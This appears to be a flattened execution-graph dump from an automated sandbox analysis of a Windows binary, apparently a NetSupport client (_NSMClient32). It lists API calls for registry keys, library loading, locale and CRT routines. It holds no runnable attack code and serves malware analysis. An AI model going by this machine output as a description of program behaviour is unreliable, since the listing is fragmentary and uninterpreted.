                                                                                                                • String ID: SetDllDirectoryW$kernel32
                                                                                                                • API String ID: 190572456-2052158636
                                                                                                                • Opcode ID: cd6cf6bafad6f68695a660f5135e440b64b7058a7a9b523b903e94969380d315
                                                                                                                • Instruction ID: f0f24b46a8b35c60d0046942ae1fca182e8259283ef927a52db87108ea37003c
                                                                                                                • Opcode Fuzzy Hash: cd6cf6bafad6f68695a660f5135e440b64b7058a7a9b523b903e94969380d315
                                                                                                                • Instruction Fuzzy Hash: 1FD0A7F034822010561867735C17E27115C8900F4576A912F7185D0085CE5CC484E12C

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:4.2%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:11.9%
                                                                                                                Total number of Nodes:2000
                                                                                                                Total number of Limit Nodes:76
                                                                                                                execution_graph 103851 110179e0 GetTickCount 103858 110178f0 103851->103858 103859 11017910 103858->103859 103860 110179c6 103858->103860 103861 11017932 CoInitialize _GetRawWMIStringW 103859->103861 103863 11017929 WaitForSingleObject 103859->103863 103890 11162bb7 103860->103890 103864 110179b2 103861->103864 103867 11017965 103861->103867 103863->103861 103864->103860 103866 110179c0 CoUninitialize 103864->103866 103865 110179d5 103871 11017810 103865->103871 103866->103860 103867->103864 103868 110179ac 103867->103868 103898 111648ed 103867->103898 103903 111646f7 67 API calls __fassign 103868->103903 103872 11017830 103871->103872 103879 110178d6 103871->103879 103873 11017848 CoInitialize _GetRawWMIStringW 103872->103873 103875 1101783f WaitForSingleObject 103872->103875 103876 110178c2 103873->103876 103880 1101787b 103873->103880 103874 11162bb7 __87except 5 API calls 103877 110178e5 SetEvent GetTickCount 103874->103877 103875->103873 103878 110178d0 CoUninitialize 103876->103878 103876->103879 103884 11147060 103877->103884 103878->103879 103879->103874 103880->103876 103881 110178bc 103880->103881 103883 111648ed __hextodec 79 API calls 103880->103883 103906 111646f7 67 API calls __fassign 103881->103906 103883->103880 103885 11147071 103884->103885 103886 1114706c 103884->103886 103908 111464c0 103885->103908 103907 11146270 18 API calls std::locale::_Init 103886->103907 103891 11162bc1 IsDebuggerPresent 103890->103891 103892 11162bbf 103890->103892 103904 111784f7 103891->103904 103892->103865 103895 1116cb59 SetUnhandledExceptionFilter UnhandledExceptionFilter 103896 1116cb7e GetCurrentProcess TerminateProcess 103895->103896 103897 1116cb76 __call_reportfault 103895->103897 103896->103865 103897->103896 103899 1116490d 103898->103899 103900 111648fb 103898->103900 103905 1116489c 79 API calls 2 library calls 103899->103905 103900->103867 103902 11164917 103902->103867 103903->103864 103904->103895 103905->103902 103906->103876 103907->103885 103911 11146370 103908->103911 103910 11017a27 103912 11146394 103911->103912 103913 11146399 103911->103913 103931 11146270 18 API calls std::locale::_Init 103912->103931 103915 11146402 103913->103915 103916 111463a2 103913->103916 103918 111464ae 103915->103918 103919 1114640f wsprintfA 103915->103919 103917 111463d9 103916->103917 103922 111463b0 103916->103922 103925 11162bb7 __87except 5 API calls 103917->103925 103920 11162bb7 __87except 5 API calls 103918->103920 103921 11146432 103919->103921 103923 111464ba 103920->103923 103921->103921 103924 11146439 wvsprintfA 103921->103924 103927 11162bb7 __87except 5 API calls 103922->103927 103923->103910 103928 11146454 OutputDebugStringA 103924->103928 103926 111463fe 103925->103926 103926->103910 103929 111463d5 103927->103929 103928->103918 103929->103910 103931->103913 103932 110262c0 LoadLibraryA 103933 11031780 103934 1103178e 103933->103934 103938 11146a90 103934->103938 103937 110317af std::locale::_Init 103941 11145be0 103938->103941 103942 11145bf0 103941->103942 103942->103942 103947 11110230 103942->103947 103944 11145c02 103954 11145b10 103944->103954 103946 1103179f SetUnhandledExceptionFilter 103946->103937 103965 11163a11 103947->103965 103950 11110247 103982 11029a70 265 API calls 2 library calls 103950->103982 103951 1111025e _memset 103951->103944 103955 11145b27 _strncpy 103954->103955 103956 11145b62 __crtGetStringTypeA_stat 103954->103956 103955->103955 103957 11162bb7 __87except 5 API calls 103955->103957 103991 11143300 MultiByteToWideChar 103956->103991 103960 11145b5e 103957->103960 103959 11145b94 103992 11143340 WideCharToMultiByte GetLastError 103959->103992 103960->103946 103962 11145ba6 103963 11162bb7 __87except 5 API calls 103962->103963 103964 11145bb9 103963->103964 103964->103946 103966 11163a8e 103965->103966 103972 11163a1f 103965->103972 103989 1116e368 DecodePointer 103966->103989 103968 11163a94 103990 1116a1af 66 API calls __getptd_noexit 103968->103990 103971 11163a4d RtlAllocateHeap 103971->103972 103981 1111023e 103971->103981 103972->103971 103974 11163a7a 103972->103974 103975 11163a2a 103972->103975 103979 11163a78 103972->103979 103986 1116e368 DecodePointer 103972->103986 103987 1116a1af 66 API calls __getptd_noexit 103974->103987 103975->103972 103983 1116e85d 66 API calls __NMSG_WRITE 103975->103983 103984 1116e6ae 66 API calls 6 library calls 103975->103984 103985 1116e3ed GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 103975->103985 103988 1116a1af 66 API calls __getptd_noexit 103979->103988 103981->103950 103981->103951 103983->103975 103984->103975 103986->103972 103987->103979 103988->103981 103989->103968 103990->103981 103991->103959 103992->103962 103993 11041180 103994 110411b2 103993->103994 103995 110411b8 103994->103995 104002 110411d4 103994->104002 103996 110fb470 15 API calls 103995->103996 103998 110411ca CloseHandle 103996->103998 103997 110412e8 103999 11162bb7 __87except 5 API calls 103997->103999 103998->104002 104001 110412f5 103999->104001 104000 11041268 104015 110fb470 GetTokenInformation 104000->104015 104002->103997 104005 1104120d 104002->104005 104025 110881d0 297 API calls 5 library calls 104002->104025 104005->103997 104005->104000 104006 1104127a 104007 11041282 CloseHandle 104006->104007 104011 11041289 104006->104011 104007->104011 104008 110412cb 104009 11162bb7 __87except 5 API calls 104008->104009 104013 110412e4 104009->104013 104010 110412b1 104012 11162bb7 __87except 5 API calls 104010->104012 104011->104008 104011->104010 104014 110412c7 104012->104014 104016 110fb4b8 104015->104016 104017 110fb4a7 104015->104017 104026 110f2300 9 API calls 104016->104026 104018 11162bb7 __87except 5 API calls 104017->104018 104020 110fb4b4 104018->104020 104020->104006 104021 110fb4dc 104021->104017 104022 110fb4e4 104021->104022 104022->104022 104023 11162bb7 __87except 5 API calls 104022->104023 104024 110fb50a 104023->104024 104024->104006 104025->104005 104026->104021 104027 11144dd0 104028 11144de1 104027->104028 104041 111447f0 104028->104041 104032 11144e65 104035 11144e82 104032->104035 104037 11144e64 104032->104037 104033 11144e2b 104034 11144e32 ResetEvent 104033->104034 104049 111449b0 265 API calls 2 library calls 104034->104049 104037->104032 104050 111449b0 265 API calls 2 library calls 104037->104050 104038 11144e46 SetEvent WaitForMultipleObjects 104038->104034 104038->104037 104040 11144e7f 104040->104035 104042 111447fc GetCurrentProcess 104041->104042 104043 1114481f 104041->104043 104042->104043 104044 1114480d GetModuleFileNameA 104042->104044 104047 11144849 WaitForMultipleObjects 104043->104047 104051 111101b0 104043->104051 104044->104043 104047->104032 104047->104033 104049->104038 104050->104040 104052 11163a11 _malloc 66 API calls 104051->104052 104053 111101ce 104052->104053 104054 11110203 _memset 104053->104054 104055 111101d7 wsprintfA 104053->104055 104058 11162bb7 __87except 5 API calls 104054->104058 104074 11029a70 265 API calls 2 library calls 104055->104074 104059 1111021d 104058->104059 104059->104047 104060 11144140 GetModuleFileNameA 104059->104060 104061 111441c3 104060->104061 104062 11144183 104060->104062 104064 111441cf LoadLibraryA 104061->104064 104065 111441e9 GetModuleHandleA GetProcAddress 104061->104065 104075 11081e00 104062->104075 104064->104065 104067 111441de LoadLibraryA 104064->104067 104068 11144217 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 104065->104068 104069 11144209 104065->104069 104066 11144191 104066->104061 104070 11144198 LoadLibraryA 104066->104070 104067->104065 104071 11144243 10 API calls 104068->104071 104069->104071 104070->104061 104072 11162bb7 __87except 5 API calls 104071->104072 104073 111442c0 104072->104073 104073->104047 104076 11081e13 _strrchr 104075->104076 104078 11081e2a std::locale::_Init 104076->104078 104079 11081c50 IsDBCSLeadByte 104076->104079 104078->104066 104079->104078 104080 651020 GetCommandLineW 104081 651035 GetStartupInfoW 104080->104081 104083 651096 GetModuleHandleW 104081->104083 104084 651091 104081->104084 104087 651000 _NSMClient32 104083->104087 104084->104083 104086 6510a8 ExitProcess 104087->104086 104088 11174898 104111 1116c675 104088->104111 104090 111748b5 _LcidFromHexString 104091 111748c2 GetLocaleInfoA 104090->104091 104092 111748f5 104091->104092 104093 111748e9 104091->104093 104116 1116558e 85 API calls 3 library calls 104092->104116 104096 11162bb7 __87except 5 API calls 104093->104096 104095 11174901 104097 1117490b GetLocaleInfoA 104095->104097 104104 1117493b _LangCountryEnumProc@4 _strlen 104095->104104 104098 11174a65 104096->104098 104097->104093 104099 1117492a 104097->104099 104117 1116558e 85 API calls 3 library calls 104099->104117 104100 111749ae GetLocaleInfoA 104100->104093 104102 111749d1 104100->104102 104119 1116558e 85 API calls 3 library calls 104102->104119 104104->104093 104104->104100 104105 111749dc 104105->104093 104109 111749e4 _strlen 104105->104109 104120 1116558e 85 API calls 3 library calls 104105->104120 104106 11174935 104106->104104 104118 11164644 85 API calls 3 library calls 104106->104118 104109->104093 104121 1117483d GetLocaleInfoW _GetPrimaryLen _strlen 104109->104121 104122 1116c5fc GetLastError 104111->104122 104113 1116c67d 104114 1116c68a 104113->104114 104136 1116e66a 66 API calls 3 library calls 104113->104136 104114->104090 104116->104095 104117->104106 104118->104104 104119->104105 104120->104109 104121->104093 104137 1116c4ba TlsGetValue 104122->104137 104125 1116c669 SetLastError 104125->104113 104128 1116c62f DecodePointer 104129 1116c644 104128->104129 104130 1116c660 104129->104130 104131 1116c648 104129->104131 104147 11163aa5 104130->104147 104146 1116c548 66 API calls 4 library calls 104131->104146 104134 1116c666 104134->104125 104135 1116c650 GetCurrentThreadId 104135->104125 104138 1116c4cf DecodePointer TlsSetValue 104137->104138 104139 1116c4ea 104137->104139 104138->104139 104139->104125 104140 1116ac7e 104139->104140 104143 1116ac87 104140->104143 104142 1116acc4 104142->104125 104142->104128 104143->104142 104144 1116aca5 Sleep 104143->104144 104153 11170fc4 104143->104153 104145 1116acba 104144->104145 104145->104142 104145->104143 104146->104135 104148 11163ab0 HeapFree 104147->104148 104149 11163ad9 __dosmaperr 104147->104149 104148->104149 104150 11163ac5 104148->104150 104149->104134 104164 1116a1af 66 API calls __getptd_noexit 104150->104164 104152 11163acb GetLastError 104152->104149 104154 11170fd0 104153->104154 104160 11170feb 104153->104160 104155 11170fdc 104154->104155 104154->104160 104162 1116a1af 66 API calls __getptd_noexit 104155->104162 104156 11170ffe RtlAllocateHeap 104156->104160 104161 11171025 104156->104161 104158 11170fe1 104158->104143 104160->104156 104160->104161 104163 1116e368 DecodePointer 104160->104163 104161->104143 104162->104158 104163->104160 104164->104152 104165 11030ef3 RegOpenKeyExA 104166 11030f20 104165->104166 104167 1103103d 104165->104167 104249 11143bd0 RegQueryValueExA 104166->104249 104169 11031061 104167->104169 104171 11031145 104167->104171 104174 111101b0 std::locale::_Init 265 API calls 104169->104174 104173 111101b0 std::locale::_Init 265 API calls 104171->104173 104172 11031030 RegCloseKey 104172->104167 104177 1103114c 104173->104177 104182 11031088 104174->104182 104400 110fae60 272 API calls std::locale::_Init 104177->104400 104178 111648ed __hextodec 79 API calls 104179 11030f6d 104178->104179 104181 11030f86 104179->104181 104183 111648ed __hextodec 79 API calls 104179->104183 104185 11163ca7 std::locale::_Init 79 API calls 104181->104185 104184 110312db GetStockObject GetObjectA 104182->104184 104183->104179 104186 1103130a SetErrorMode SetErrorMode 104184->104186 104190 11030f92 104185->104190 104188 111101b0 std::locale::_Init 265 API calls 104186->104188 104189 11031346 104188->104189 104255 11028980 104189->104255 104190->104172 104192 11143bd0 std::locale::_Init RegQueryValueExA 104190->104192 104194 11030fe8 104192->104194 104193 11031360 104197 111101b0 std::locale::_Init 265 API calls 104193->104197 104195 11143bd0 std::locale::_Init RegQueryValueExA 104194->104195 104196 11031011 104195->104196 104196->104172 104198 11031386 104197->104198 104199 11028980 268 API calls 104198->104199 104200 1103139f InterlockedExchange 104199->104200 104202 111101b0 std::locale::_Init 265 API calls 104200->104202 104203 110313c7 104202->104203 104258 1108a880 104203->104258 104205 110313df GetACP 104269 11163f93 104205->104269 104210 11031410 104316 11143780 104210->104316 104213 111101b0 std::locale::_Init 265 API calls 104214 1103145c 104213->104214 104322 11061aa0 104214->104322 104216 110314d4 104341 110ccc90 104216->104341 104218 111101b0 std::locale::_Init 265 API calls 104220 110314ae 104218->104220 104401 11061710 104220->104401 104222 111101b0 std::locale::_Init 265 API calls 104223 11031501 104222->104223 104348 11125d40 104223->104348 104250 11030f4a 104249->104250 104250->104172 104251 11163ca7 104250->104251 104252 11163c91 104251->104252 104414 1116450b 104252->104414 104256 11088b30 268 API calls 104255->104256 104257 1102898b _memset 104256->104257 104257->104193 104259 111101b0 std::locale::_Init 265 API calls 104258->104259 104260 1108a8b7 104259->104260 104261 1108a8d9 InitializeCriticalSection 104260->104261 104262 111101b0 std::locale::_Init 265 API calls 104260->104262 104265 1108a93a 104261->104265 104264 1108a8d2 104262->104264 104264->104261 104508 1116305a 66 API calls std::exception::_Copy_str 104264->104508 104265->104205 104267 1108a909 104509 111634b1 RaiseException 104267->104509 104270 11163fc6 104269->104270 104271 11163fb1 104269->104271 104270->104271 104273 11163fcd 104270->104273 104510 1116a1af 66 API calls __getptd_noexit 104271->104510 104512 1117027b 102 API calls 12 library calls 104273->104512 104274 11163fb6 104511 1116edc4 11 API calls __mbsnbicmp_l 104274->104511 104277 11163ff3 104278 11031406 104277->104278 104513 111700e4 97 API calls 7 library calls 104277->104513 104280 111663a3 104278->104280 104281 111663af __CRT_INIT@12 104280->104281 104282 111663d0 104281->104282 104283 111663b9 104281->104283 104285 1116c675 __getptd 66 API calls 104282->104285 104539 1116a1af 66 API calls __getptd_noexit 104283->104539 104287 111663d5 104285->104287 104286 111663be 104540 1116edc4 11 API calls __mbsnbicmp_l 104286->104540 104289 11171306 _LocaleUpdate::_LocaleUpdate 74 API calls 104287->104289 104290 111663df 104289->104290 104291 1116ac7e __calloc_crt 66 API calls 104290->104291 104292 111663f5 104291->104292 104293 111663c9 __CRT_INIT@12 _setlocale 104292->104293 104294 1117459f __lock 66 API calls 104292->104294 104293->104210 104295 1116640b 104294->104295 104514 11165814 104295->104514 104302 111664ec 104545 111710d5 8 API calls 104302->104545 104303 1116643b __tzset_nolock 104305 1117459f __lock 66 API calls 104303->104305 104307 11166461 104305->104307 104306 111664f2 104546 1117116e 66 API calls 4 library calls 104306->104546 104541 111712b9 74 API calls 3 library calls 104307->104541 104310 11166473 104542 111710d5 8 API calls 104310->104542 104312 11166479 104313 11166497 104312->104313 104543 111712b9 74 API calls 3 library calls 104312->104543 104544 111664e1 LeaveCriticalSection _doexit 104313->104544 104698 11143690 104316->104698 104318 11143690 IsDBCSLeadByte 104319 11143795 104318->104319 104319->104318 104320 11166654 85 API calls std::locale::_Init 104319->104320 104321 1103143c 104319->104321 104320->104319 104321->104213 104323 11061710 293 API calls 104322->104323 104324 11061ade 104323->104324 104325 111101b0 std::locale::_Init 265 API calls 104324->104325 104326 11061b0b 104325->104326 104327 11061710 293 API calls 104326->104327 104328 11061b24 104326->104328 104327->104328 104329 111101b0 std::locale::_Init 265 API calls 104328->104329 104330 11061b35 104329->104330 104331 11061710 293 API calls 104330->104331 104333 11061b4e 104330->104333 104331->104333 104332 11031487 104332->104216 104332->104218 104333->104332 104710 11142e60 104333->104710 104335 11061b76 104719 11061a70 104335->104719 104342 110ccc99 104341->104342 104343 110314fa 104341->104343 104868 11145410 GetSystemMetrics GetSystemMetrics 104342->104868 104343->104222 104345 110ccca0 std::locale::_Init 104345->104343 104346 110cccae CreateWindowExA 104345->104346 104346->104343 104347 110cccd8 SetClassLongA 104346->104347 104347->104343 104349 111101b0 std::locale::_Init 265 API calls 104348->104349 104350 11125d74 104349->104350 104351 11125d8a 104350->104351 104353 11125da5 104350->104353 104915 110765c0 463 API calls std::locale::_Init 104351->104915 104869 11124f70 104353->104869 104354 11125d9a 104354->104353 104400->104182 104402 111101b0 std::locale::_Init 265 API calls 104401->104402 104403 11061761 104402->104403 104404 11061777 InitializeCriticalSection 104403->104404 106018 11061210 266 API calls 3 library calls 104403->106018 104407 110617b7 104404->104407 104412 11061826 104404->104412 106019 1105f830 287 API calls 3 library calls 104407->106019 104409 110617d8 RegCreateKeyExA 104410 11061832 RegCreateKeyExA 104409->104410 104411 110617ff RegCreateKeyExA 104409->104411 104410->104412 104413 11061865 RegCreateKeyExA 104410->104413 104411->104410 104411->104412 104412->104216 104413->104412 104415 11164524 104414->104415 104418 111642e0 104415->104418 104430 11164259 104418->104430 104420 11164304 104438 1116a1af 66 API calls __getptd_noexit 104420->104438 104423 11164309 104439 1116edc4 11 API calls __mbsnbicmp_l 104423->104439 104426 1116433a 104427 11164381 104426->104427 104440 11171a63 79 API calls 3 library calls 104426->104440 104429 11030f5e 104427->104429 104441 1116a1af 66 API calls __getptd_noexit 104427->104441 104429->104178 104431 1116426c 104430->104431 104437 111642b9 104430->104437 104432 1116c675 __getptd 66 API calls 104431->104432 104433 11164271 104432->104433 104434 11164299 104433->104434 104442 11171306 104433->104442 104434->104437 104457 111715a2 68 API calls 6 library calls 104434->104457 104437->104420 104437->104426 104438->104423 104439->104429 104440->104426 104441->104429 104443 11171312 __CRT_INIT@12 104442->104443 104444 1116c675 __getptd 66 API calls 104443->104444 104445 11171317 104444->104445 104446 11171345 104445->104446 104447 11171329 104445->104447 104459 1117459f 104446->104459 104449 1116c675 __getptd 66 API calls 104447->104449 104455 1117132e 104449->104455 104450 1117134c 104466 111712b9 74 API calls 3 library calls 104450->104466 104452 11171360 104467 11171373 LeaveCriticalSection _doexit 104452->104467 104454 1117133c __CRT_INIT@12 104454->104434 104455->104454 104458 1116e66a 66 API calls 3 library calls 104455->104458 104457->104437 104460 111745c7 EnterCriticalSection 104459->104460 104461 111745b4 104459->104461 104460->104450 104468 111744dd 104461->104468 104463 111745ba 104463->104460 104495 1116e66a 66 API calls 3 library calls 104463->104495 104466->104452 104467->104455 104469 111744e9 __CRT_INIT@12 104468->104469 104470 11174511 104469->104470 104471 111744f9 104469->104471 104477 1117451f __CRT_INIT@12 104470->104477 104499 1116ac39 104470->104499 104496 1116e85d 66 API calls __NMSG_WRITE 104471->104496 104473 111744fe 104497 1116e6ae 66 API calls 6 library calls 104473->104497 104477->104463 104478 11174505 104498 1116e3ed GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 104478->104498 104479 11174531 104505 1116a1af 66 API calls __getptd_noexit 104479->104505 104480 11174540 104481 1117459f __lock 65 API calls 104480->104481 104484 11174547 104481->104484 104486 1117454f InitializeCriticalSectionAndSpinCount 104484->104486 104487 1117457a 104484->104487 104488 1117455f 104486->104488 104491 1117456b 104486->104491 104489 11163aa5 _free 65 API calls 104487->104489 104490 11163aa5 _free 65 API calls 104488->104490 104489->104491 104492 11174565 104490->104492 104507 11174596 LeaveCriticalSection _doexit 104491->104507 104506 1116a1af 66 API calls __getptd_noexit 104492->104506 104496->104473 104497->104478 104501 1116ac42 104499->104501 104500 11163a11 _malloc 65 API calls 104500->104501 104501->104500 104502 1116ac78 104501->104502 104503 1116ac59 Sleep 104501->104503 104502->104479 104502->104480 104504 1116ac6e 104503->104504 104504->104501 104504->104502 104505->104477 104506->104491 104507->104477 104508->104267 104509->104261 104510->104274 104511->104278 104512->104277 104513->104278 104515 1116581d 104514->104515 104516 11165836 104514->104516 104515->104516 104547 11171046 8 API calls 104515->104547 104518 111664d5 104516->104518 104548 111744c6 LeaveCriticalSection 104518->104548 104520 11166422 104521 11166187 104520->104521 104522 111661b0 104521->104522 104527 111661cb 104521->104527 104523 111661ba 104522->104523 104525 11165e4d __setlocale_set_cat 101 API calls 104522->104525 104529 11162bb7 __87except 5 API calls 104523->104529 104524 1116631c 104549 11165c2c 104524->104549 104525->104523 104527->104524 104533 11166200 _strpbrk _strncmp _strcspn _strlen 104527->104533 104535 111662f5 104527->104535 104530 111663a1 104529->104530 104530->104302 104530->104303 104531 11166331 __tzset_nolock 104531->104523 104531->104535 104563 11165e4d 104531->104563 104533->104523 104533->104535 104536 1116630e 104533->104536 104538 11165e4d __setlocale_set_cat 101 API calls 104533->104538 104605 111699f9 66 API calls 2 library calls 104533->104605 104535->104523 104609 11165ac7 70 API calls 6 library calls 104535->104609 104606 1116ed72 104536->104606 104538->104533 104539->104286 104540->104293 104541->104310 104542->104312 104543->104313 104544->104293 104545->104306 104546->104293 104547->104516 104548->104520 104550 1116c675 __getptd 66 API calls 104549->104550 104551 11165c67 104550->104551 104552 11165cd4 104551->104552 104561 11165ccd __tzset_nolock _memmove _strlen 104551->104561 104653 1116cd5f 104551->104653 104553 11162bb7 __87except 5 API calls 104552->104553 104554 11165e4b 104553->104554 104554->104531 104557 1116ed72 __invoke_watson 10 API calls 104557->104561 104559 1116cd5f _strcpy_s 66 API calls 104559->104561 104561->104552 104561->104557 104561->104559 104610 1116593d 104561->104610 104617 11174bcc 104561->104617 104662 11165a5c 66 API calls 3 library calls 104561->104662 104663 111699f9 66 API calls 2 library calls 104561->104663 104564 1116c675 __getptd 66 API calls 104563->104564 104565 11165e7a 104564->104565 104566 11165c2c __expandlocale 96 API calls 104565->104566 104570 11165ea2 __tzset_nolock _strlen 104566->104570 104567 11165ea9 104568 11162bb7 __87except 5 API calls 104567->104568 104569 11165eb7 104568->104569 104569->104531 104570->104567 104571 1116ac39 __malloc_crt 66 API calls 104570->104571 104572 11165ef3 _memmove 104571->104572 104572->104567 104573 1116cd5f _strcpy_s 66 API calls 104572->104573 104580 11165f66 _memmove 104573->104580 104574 11166155 104575 1116ed72 __invoke_watson 10 API calls 104574->104575 104576 11166186 104575->104576 104577 111661b0 104576->104577 104586 111661cb 104576->104586 104579 111661ba 104577->104579 104582 11165e4d __setlocale_set_cat 100 API calls 104577->104582 104578 111662f5 104578->104579 104691 11165ac7 70 API calls 6 library calls 104578->104691 104588 11162bb7 __87except 5 API calls 104579->104588 104580->104574 104596 1116606a _memcmp 104580->104596 104689 11174ea4 79 API calls 2 library calls 104580->104689 104581 1116631c 104587 11165c2c __expandlocale 96 API calls 104581->104587 104582->104579 104584 111660f0 104589 11163aa5 _free 66 API calls 104584->104589 104585 11166121 104585->104574 104591 1116612d InterlockedDecrement 104585->104591 104586->104578 104586->104581 104601 11166200 _strpbrk _strncmp _strcspn _strlen 104586->104601 104598 11166331 __tzset_nolock 104587->104598 104592 111663a1 104588->104592 104589->104567 104591->104574 104593 11166145 104591->104593 104592->104531 104594 11163aa5 _free 66 API calls 104593->104594 104595 1116614d 104594->104595 104597 11163aa5 _free 66 API calls 104595->104597 104596->104584 104596->104585 104597->104574 104598->104578 104598->104579 104599 11165e4d __setlocale_set_cat 100 API calls 104598->104599 104599->104598 104601->104578 104601->104579 104602 1116630e 104601->104602 104604 11165e4d __setlocale_set_cat 100 API calls 104601->104604 104690 111699f9 66 API calls 2 library calls 104601->104690 104603 1116ed72 __invoke_watson 10 API calls 104602->104603 104603->104579 104604->104601 104605->104533 104692 1116ec49 104606->104692 104609->104523 104612 11165956 _memset 104610->104612 104611 11165962 104611->104561 104612->104611 104615 11165985 _strcspn 104612->104615 104664 111699f9 66 API calls 2 library calls 104612->104664 104614 1116ed72 __invoke_watson 10 API calls 104614->104615 104615->104611 104615->104614 104665 111699f9 66 API calls 2 library calls 104615->104665 104618 1116c675 __getptd 66 API calls 104617->104618 104622 11174bd9 104618->104622 104619 11174be6 GetUserDefaultLCID 104648 11174c6d 104619->104648 104621 11174c10 104623 11174c78 104621->104623 104626 11174c22 104621->104626 104622->104619 104622->104621 104676 1117463f 85 API calls _LanguageEnumProc@4 104622->104676 104623->104619 104627 11174c83 _strlen 104623->104627 104624 11174dae 104624->104561 104629 11174c36 104626->104629 104630 11174c2d 104626->104630 104634 11174c89 EnumSystemLocalesA 104627->104634 104681 11174b90 EnumSystemLocalesA _GetPrimaryLen _strlen 104629->104681 104677 11174b29 104630->104677 104632 11174cde 104632->104624 104637 11174d03 IsValidCodePage 104632->104637 104634->104648 104635 11174c34 104635->104648 104682 1117463f 85 API calls _LanguageEnumProc@4 104635->104682 104637->104624 104638 11174d15 IsValidLocale 104637->104638 104638->104624 104644 11174d28 104638->104644 104639 11174c54 104640 11174c6f 104639->104640 104641 11174c66 104639->104641 104639->104648 104683 11174b90 EnumSystemLocalesA _GetPrimaryLen _strlen 104640->104683 104645 11174b29 _GetLcidFromLangCountry EnumSystemLocalesA 104641->104645 104643 11174d79 GetLocaleInfoA 104643->104624 104647 11174d8a GetLocaleInfoA 104643->104647 104644->104624 104644->104643 104646 1116cd5f _strcpy_s 66 API calls 104644->104646 104645->104648 104649 11174d66 104646->104649 104647->104624 104650 11174d9e 104647->104650 104648->104624 104666 111746a1 104648->104666 104649->104647 104652 1116ed72 __invoke_watson 10 API calls 104649->104652 104684 1116c308 66 API calls _xtoa_s@20 104650->104684 104652->104643 104654 1116cd74 104653->104654 104655 1116cd6d 104653->104655 104686 1116a1af 66 API calls __getptd_noexit 104654->104686 104655->104654 104660 1116cd92 104655->104660 104657 1116cd79 104687 1116edc4 11 API calls __mbsnbicmp_l 104657->104687 104659 1116cd83 104659->104561 104660->104659 104688 1116a1af 66 API calls __getptd_noexit 104660->104688 104662->104561 104663->104561 104664->104615 104665->104615 104667 111746fb GetLocaleInfoW 104666->104667 104668 111746ab __tzset_nolock 104666->104668 104669 11174717 104667->104669 104670 111746ea 104667->104670 104668->104667 104672 111746c1 __tzset_nolock 104668->104672 104669->104670 104671 1117471d GetACP 104669->104671 104670->104632 104671->104632 104673 111746d2 GetLocaleInfoW 104672->104673 104674 111746ef 104672->104674 104673->104670 104685 11163c91 79 API calls __wcstoi64 104674->104685 104676->104621 104678 11174b30 _GetPrimaryLen _strlen 104677->104678 104679 11174b66 EnumSystemLocalesA 104678->104679 104680 11174b80 104679->104680 104680->104635 104681->104635 104682->104639 104683->104648 104684->104624 104685->104670 104686->104657 104687->104659 104688->104657 104689->104596 104690->104601 104691->104579 104694 1116ec68 _memset __call_reportfault 104692->104694 104693 1116ec86 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 104695 1116ed54 __call_reportfault 104693->104695 104694->104693 104696 11162bb7 __87except 5 API calls 104695->104696 104697 1116ed70 GetCurrentProcess TerminateProcess 104696->104697 104697->104523 104699 111436a6 104698->104699 104700 11143763 104699->104700 104705 11081d30 104699->104705 104700->104319 104702 111436cb 104703 11081d30 IsDBCSLeadByte 104702->104703 104704 111436fb _memmove 104703->104704 104704->104319 104706 11081d3c 104705->104706 104708 11081d41 __mbschr_l std::locale::_Init 104705->104708 104709 11081c50 IsDBCSLeadByte 104706->104709 104708->104702 104709->104708 104711 11142e6c 104710->104711 104712 11142e6a 104710->104712 104713 11110230 std::locale::_Init 265 API calls 104711->104713 104712->104335 104714 11142e92 104713->104714 104715 11142e9b _strncpy 104714->104715 104716 11142eb9 104714->104716 104715->104335 104722 11029a70 265 API calls 2 library calls 104716->104722 104723 11061970 104719->104723 104734 11061290 104723->104734 104727 11061a08 104781 11061170 104727->104781 104729 11061a1a 104730 11162bb7 __87except 5 API calls 104729->104730 104732 11061a32 104730->104732 104731 11061320 274 API calls 104733 110619cc 104731->104733 104733->104727 104733->104731 104735 111101b0 std::locale::_Init 265 API calls 104734->104735 104736 110612ac 104735->104736 104737 110612f5 104736->104737 104738 110612b3 104736->104738 104793 1116305a 66 API calls std::exception::_Copy_str 104737->104793 104786 1105ee10 104738->104786 104741 11061304 104794 111634b1 RaiseException 104741->104794 104742 110612eb 104745 11061320 104742->104745 104744 11061319 104746 11061635 104745->104746 104749 11061355 104745->104749 104746->104733 104747 11061624 104748 1105ee10 68 API calls 104747->104748 104748->104746 104750 110614b4 104749->104750 104752 11061401 RegEnumValueA 104749->104752 104753 11061389 RegQueryInfoKeyA 104749->104753 104750->104747 104778 11061542 std::ios_base::_Ios_base_dtor 104750->104778 104795 110611e0 104750->104795 104754 1106149c 104752->104754 104766 11061435 104752->104766 104755 110613c2 104753->104755 104756 110613ae 104753->104756 104759 11163aa5 _free 66 API calls 104754->104759 104760 110613e2 104755->104760 104802 11029a70 265 API calls 2 library calls 104755->104802 104801 11029a70 265 API calls 2 library calls 104756->104801 104757 11081d30 IsDBCSLeadByte 104757->104766 104761 110614a9 104759->104761 104763 11163a11 _malloc 66 API calls 104760->104763 104761->104750 104768 110613f0 104763->104768 104765 1106146e RegEnumValueA 104765->104754 104765->104766 104766->104757 104766->104765 104779 11061649 std::ios_base::_Ios_base_dtor 104766->104779 104803 11081e70 104766->104803 104767 110615a0 104767->104778 104816 11029a70 265 API calls 2 library calls 104767->104816 104768->104752 104770 11146a90 268 API calls 104770->104778 104773 1106151f 104814 1105ef20 265 API calls std::locale::_Init 104773->104814 104774 11081d30 IsDBCSLeadByte 104774->104778 104776 11061532 104815 1105fdc0 85 API calls _LanguageEnumProc@4 104776->104815 104778->104747 104778->104767 104778->104770 104778->104774 104778->104779 104780 11081e70 86 API calls 104778->104780 104779->104733 104780->104778 104782 1105ee10 68 API calls 104781->104782 104783 110611a3 104782->104783 104784 110608e0 67 API calls 104783->104784 104785 110611c2 std::ios_base::_Ios_base_dtor 104784->104785 104785->104729 104787 1105ee21 LeaveCriticalSection 104786->104787 104788 1105ee2b 104786->104788 104787->104788 104789 1105ee3f 104788->104789 104790 11163aa5 _free 66 API calls 104788->104790 104791 1105ee85 104789->104791 104792 1105ee49 EnterCriticalSection 104789->104792 104790->104789 104791->104742 104792->104742 104793->104741 104794->104744 104796 110611ee 104795->104796 104797 11061208 104795->104797 104817 110608e0 104796->104817 104797->104778 104813 